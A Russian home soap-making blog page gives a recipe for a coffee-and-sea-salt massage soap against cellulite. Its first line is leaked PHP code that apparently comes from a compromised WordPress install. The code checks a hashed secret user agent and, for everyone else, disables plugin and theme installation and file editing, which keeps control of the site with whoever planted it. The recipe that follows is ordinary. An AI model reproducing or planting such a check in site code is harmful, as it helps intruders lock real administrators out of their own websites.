if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Делаем своими руками специальное массажное мыло против целлюлита | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Делаем своими руками специальное массажное мыло против целлюлита

Сегодня мы расскажем как своими руками сделать специальное мыло, которое поможет остановить развитие целлюлита - будем варить массажное мыло из готового туалетного!

Сего­дня мы рас­ска­жем как сво­и­ми рука­ми сде­лать спе­ци­аль­ное мыло, кото­рое помо­жет оста­но­вить раз­ви­тие цел­люли­та — будем варить мас­саж­ное мыло из гото­во­го туалетного!

Для мыло­ва­ре­ния понадобятся:

  • Два кус­ка туа­лет­но­го мыла;
  • По 4 ст.л. моло­то­го кофе (либо гущи) и базо­во­го масла;
  • ½ ста­ка­на горя­чей воды;
  • Несколь­ко ложек мор­ской соли (круп­ной);
  • Фор­моч­ки.
  1. Мыло нате­реть на круп­ной тер­ке, влить мас­ло и рас­то­пить на водя­ной бане, посто­ян­но поме­ши­вая и добав­ляя воду, до обра­зо­ва­ния одно­род­ной массы.
    массажное из готового2
  2. Не сни­мая с огня, пор­ци­я­ми доба­вить кофе и мор­скую соль.
  3. Фор­мы сма­зать мас­лом, выло­жить в них полу­чен­ную  смесь. Оста­вить для засты­ва­ния на пару суток.
    массажное из готового3

По жела­нию (если изна­чаль­но мыло не име­ет ярко­го запа­ха) мож­но доба­вить эфир­ные мас­ла на выбор.

массажное мыло против целлюлита


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия

Обожаю в свободное время заниматься мыловарением. Уже съела на этом целую собаку! Вот теперь спешу поделиться с вами своими работами ;) Читайте все мои записи!